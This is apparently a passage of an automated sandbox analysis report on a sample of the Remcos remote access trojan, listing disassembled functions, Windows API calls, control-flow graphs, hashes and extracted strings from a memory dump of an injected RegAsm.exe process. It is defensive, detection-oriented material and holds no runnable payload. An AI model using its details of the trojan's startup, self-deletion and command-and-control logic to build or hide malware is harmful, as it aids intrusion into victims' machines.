                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                                                                                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                                                                                                                                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                                                                                                                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                                                                                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                                                                                                                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                                                                                                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3950776272-0
                                                                                                                                                                                                  • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                                                                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                                                                                                                                  Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                                                                                    • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                                                                                                    • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040F905
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                                  • String ID: 5.1.2 Pro$override$pth_unenc
                                                                                                                                                                                                  • API String ID: 2281282204-3554326054
                                                                                                                                                                                                  • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                                                                                                  • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                                                                                                                                                  Function 004489D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$FileSystem
                                                                                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$t'`/
                                                                                                                                                                                                  • API String ID: 2086374402-2186028862
                                                                                                                                                                                                  • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                                                                                                  • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                                                                                                                                                  Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,0086A1C8), ref: 004338DA
                                                                                                                                                                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                                                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1815803762-0
                                                                                                                                                                                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                                                                                  • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                                                                                                                                  Function 0041B69E Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                                                                                                                                                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Name$ComputerUser
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4229901323-0
                                                                                                                                                                                                  • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                                                                                  • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                                                                                                                                  Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                  • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                                                                                  • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                  Function 0040EA00 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->102 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 98 40ec27-40ec3d call 401fab call 4139e4 80->98 90 40ec47-40ec49 81->90 91 40ec4e-40ec55 81->91 94 40ef2c 90->94 95 40ec57 91->95 96 40ec59-40ec65 call 41b354 91->96 94->49 95->96 103 40ec67-40ec69 96->103 104 40ec6e-40ec72 96->104 98->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->126 103->104 107 40ecb1-40ecc4 call 401e65 call 401fab 104->107 108 40ec74 call 407751 104->108 128 40ecc6 call 407790 107->128 129 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->129 117 40ec79-40ec7b 108->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->107 141 40ec9c-40eca2 120->141 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 128->129 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 129->177 178 40edbb-40edbf 129->178 141->107 144 40eca4-40ecaa 141->144 144->107 147 40ecac call 40729b 144->147 147->107 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 184 40ee4a-40ee54 call 409092 181->184 185 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->185 192 40ee59-40ee7d call 40247c call 434829 184->192 185->192 212 40ee8c 192->212 213 40ee7f-40ee8a call 436f10 192->213 205->178 215 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->215 213->215 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 215->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 290 40f01b-40f01d 287->290 291 40f01f 287->291 289 40effe-40f015 call 41ce2c CreateThread 288->289 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->94 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 357 40f194-40f1a7 call 401e65 call 401fab 347->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 400 40f27b-40f27c SetProcessDEPPolicy 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                                                                                                                                                    • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                                                  • String ID: 8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-EPF38I$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                                                                                                                                  • API String ID: 2830904901-3119171474
                                                                                                                                                                                                  • Opcode ID: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                                                                                                                                                                                  • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                                                                                                                                                                                  Function 00414F65 Relevance: 49.8, APIs: 5, Strings: 23, Instructions: 809sleepnetworkCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 613 415220-415246 call 402093 * 2 call 41b580 606->613 614 41524b-415260 call 404f51 call 4048c8 606->614 630 415ade-415af0 call 404e26 call 4021fa 607->630 613->630 629 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 614->629 614->630 694 4153bb-4153c8 call 405aa6 629->694 695 4153cd-4153f4 call 401fab call 4135e1 629->695 642 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 630->642 643 415b18-415b20 call 401e8d 630->643 642->643 643->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-4154c0 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 695->702 701->702 725 4154c5-415a51 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 702->725 948 415a53-415a5a 725->948 949 415a65-415a6c 725->949 948->949 950 415a5c-415a5e 948->950 951 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->951 952 415a6e-415a73 call 40b08c 949->952 950->949 963 415aac-415ab8 CreateThread 951->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 951->964 952->951 963->964 964->630
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                                                                  • String ID: | $%I64u$5.1.2 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-EPF38I$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                                                                                                                                                  • API String ID: 524882891-3751314634
                                                                                                                                                                                                  • Opcode ID: 8eec2c691427c46707f38074d2631b5f8e9ad24c24841cd07b2db5240619491e
                                                                                                                                                                                                  • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8eec2c691427c46707f38074d2631b5f8e9ad24c24841cd07b2db5240619491e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                                                                                                                                                                                                  Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
